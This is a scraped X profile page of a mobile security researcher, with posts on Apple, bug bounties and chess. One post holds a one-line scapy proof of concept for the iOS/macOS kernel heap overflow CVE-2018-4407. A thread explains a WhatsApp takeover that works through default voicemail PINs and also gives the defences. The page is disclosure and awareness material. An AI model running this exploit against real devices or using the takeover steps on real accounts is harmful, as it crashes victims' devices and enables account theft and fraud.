Zuk (@ihackbanme) / X

Zuk

10K posts

Zuk

@ihackbanme

Mobile & Security Research | Founder @ZecOps (Acq. by JAMF) 🐊 & @ZIMPERIUM (Acq.) | #FreeTheSandbox✌ | ❤️ Chess | My random thoughts, only some are accurate.

California, Planet Earth

Joined December 2009

Pinned
Zuk
@ihackbanme
Jan 19, 2023
The recent WhatsApp accounts takeover is simple and genius. This is how it works: You're sleeping. A "hacker" tries to login to your account via WhatsApp. You get a text message with a pincode that says "Do not share this". You don't share it, yet you still get hacked. How?
1.3M
Zuk
@ihackbanme
Nov 1, 2018
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet: pip install scapy sudo scapy send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Zuk
@ihackbanme
May 24, 2021
The author of this post found the SolarWinds attack a 2-3 months before FireEye's announcement on December 8th 🤯reddit.com/r/Solarwinds/c…
Zuk
@ihackbanme
Jan 19, 2023
Replying to @ihackbanme
How to avoid this WhatsApp account takeover? 1. Make sure that your voicemail pincode is not the default pincode. 2. Setup 2FA pincode on your WhatsApp
201K
Zuk
@ihackbanme
Jan 19, 2023
Replying to @ihackbanme
Next, the attackers check your voicemail simply by trying the default pincode which is the last four digits of your cellphone number in many carriers. Then they can log in to YOUR WhatsApp.
203K
Zuk
@ihackbanme
Jan 19, 2023
Replying to @ihackbanme
The attacker clicks on the option that the SMS didn't arrive and asks for a verification by phone. WhatsApp call you. You're sleeping. It goes to Voicemail. The voicemail stores the automated voice with the pincode that the attackers are trying to obtain.
202K
Zuk
@ihackbanme
Sep 27, 2019
I'm sure that @Apple will give bootrom exploits more thinking and understand that checkm8-style exploits will happen eventually. SOLUTION: avoid embarrassment by providing an option to unlock the boot (w/ pincode). Don't fight it and lose - #FreeTheSandbox and WIN!
Zuk
@ihackbanme
Apr 8, 2023
Replying to @elonmusk and @TitterDaily
Oh you mean like the verified button?
21K
Zuk
@ihackbanme
Jan 19, 2023
Replying to @ihackbanme
After logging in, they setup a 2FA pincode on your Whatsapp to prevent you from logging back in. WhatsApp account recovery process takes several days - during this time they ask for $ from your contacts or spread malware.
198K
Zuk
@ihackbanme
Nov 19, 2022
So I’m telling @anishgiri what’s my Chess username (TheJourneyToIM) and Anish looks on my stats and says - you should have called it “I’m The Journey” 😂🤦‍♂️w/ @rpragchess @Rameshchess
Zuk
@ihackbanme
Dec 11, 2019
Apple's latest responses collection: 1. Barking at Google Project 0 for the water hole spray attacks leveraging 14 vulnerabilities. 2. Trying to acquire Correlium and then suing them 3. DMCA against tweets and Reddit posts (?!) This is not a trend. A thread.
Zuk
@ihackbanme
Oct 29, 2019
Google and Apple will soon realize that Checkm8-style bugs are inevitable. Sandbox restrictions against device owners doesn't make sense and only benefit attackers. Let people who purchased devices to have full control and #FreeTheSandbox! Resistance is futile!
Zuk
@ihackbanme
Jun 9, 2025
Replying to @elonmusk
Man, how’s that cool? Seriously. Is that what you’d expect from a $3T company? Maybe the fan boys? But a person that build huge rockets into space cares about this and think it’s cool? I wish you’d be more consistent with your values and approach … but you do you.
61K
Zuk
@ihackbanme
Apr 26, 2024
This dude found a kernel RCE on PS5 via the network (!!!). “Heartbleed”-like attack using an ancient bug from 2006. Disclosed via @Hacker0x01 to @Sony. This bug allows 3rd parties to clone games (!), cheat, or APTs to persist by compromising PS5/PS4. What did he get? $12.5k 🤦‍♂️
Zuk
@ihackbanme
Apr 25, 2024
Pretty cool bug! 1. Insane to see a known CVE from 2006 providing Remote kernel RW. 2. Only $12.5k ?? Not cool @Sony…
60K